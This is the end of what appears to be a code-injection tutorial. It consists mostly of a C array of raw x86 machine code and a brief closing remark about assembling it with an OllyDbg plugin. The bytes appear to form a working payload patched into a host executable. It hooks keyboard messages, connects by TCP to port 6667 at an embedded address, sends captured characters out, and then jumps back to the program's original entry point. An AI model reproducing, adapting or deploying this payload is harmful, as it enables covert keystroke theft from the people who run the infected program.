 0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
 0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
 0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
 0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
 0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
 0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
 0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
 0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
 0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
 0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
 0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
 0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
 0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
 0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
 0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
 0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
 0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
 0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
 0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
 0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
 0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
 0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
 0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
 0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
 0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
 0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
 0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
 0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
 0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
 0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
 0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
 0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
 0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
 0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
 0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
 0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
 0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
 0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};

Closing remarks:

It looks easy now that it is written up, but there were plenty of tears behind it -。-、、、. Converting the assembly to machine code can be done with NonaWrite, a plugin for OllyDbg.

THE END
